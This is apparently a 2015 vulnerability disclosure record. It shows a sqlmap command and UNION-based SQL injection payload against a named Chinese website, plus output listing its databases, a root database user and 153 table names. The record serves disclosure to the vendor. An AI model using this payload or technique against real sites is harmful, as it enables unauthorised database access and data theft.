2015-10-15: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
神州行,我看行.
sqlmap.py -u "http://www.ciscostation.com.cn:80/storiesview.jsp?ID=33%20AND%203*2*1%3d6%20AND%20533%3d533"
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (36) - 10 columns Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: MySQL 5available databases [6]:[*] cisstation[*] information_schema[*] mysql[*] performance_schema[*] test[*] webhost
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (36) - 10 columns Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: MySQL 5current user: 'root@localhost'
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (36) - 10 columns Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: MySQL 5Database: cisstation[153 tables]+----------------------+| 201107dc || 2011gcs || 2011smhy || 2012cxhy || 2015gcs || path || admin || adminsns || album || application || applypoly || auctioncp || auctionjl || auctionyh || bbsadmin || bbsbankuai || bbsbanzhu || bbsdengji || bbsdx || bbshuiyuan || bbspattern || bbstiezi || bbstoupiao || bbsvote || cases || cdesadmin || cdesbaobei || cdesdati || cdesjiangpin || cdesjifen || cdesman || cdesqudao || cdesquyu || cdesrenzheng || cdesxiangxi || class1 || class2 || class3 || classname || clickdemo || cnet || commissioner || company || departmentnum || diaocha201301 || ecommadmin || equiptmentnum || examine || friends || ftpdown || golfship || history || hortation || huiyimemgroup || hyjltable || hyup || indexsum || jfjhdy || jingdcp || jjadmin || jjlist || jjyear || list || listuc || log_pic || log_say || logo_member || miaosha || moneycart || moneycp || moneyimg || moneyjl || nacs2013 || nacs_txds || notes || onapply || optional || packtable || participants || personnum || pinglun || ploy || pxsheng || qianbo_about || qianbo_down || qianbo_hotp || qianbo_incentives || qianbo_incentivesort || qianbo_jikans || qianbo_jikansort || qianbo_lanmusort || qianbo_memgroup || qianbo_monetary || qianbo_monetarysort || qianbo_news || qianbo_newssort || qianbo_products || qianbo_productsort || qianbo_solutions || qianbo_solutionsort || qianbo_stories || qianbo_webfoot || research || response || scorelog || sharing || showding || sm_shijuan || sm_shijuancj || sm_shijuangr || sm_txdg || sm_txds || sm_txpg || sm_txps || sm_txtg || sm_txts || sm_wdgd || smart || smb || smbapp || smberpjf || smbinfo || smbjfnote || subadmin || subscription || threeid || title || tptitle || ucadmin || ucass || uclist || ucsapplication || ucshortation || ucsscorelog || ucssn || ucssnlspy || vbconcern || vbtiezi || vipinfo || viporder || viporders || visiting || visitor || votes || votesname || votespolls || yinhebaobei || yinhedemo || yinhejddh || yinhelog || yinhename || yinheshou || zymail |+----------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 09:27
尽快处理,谢谢!
暂无
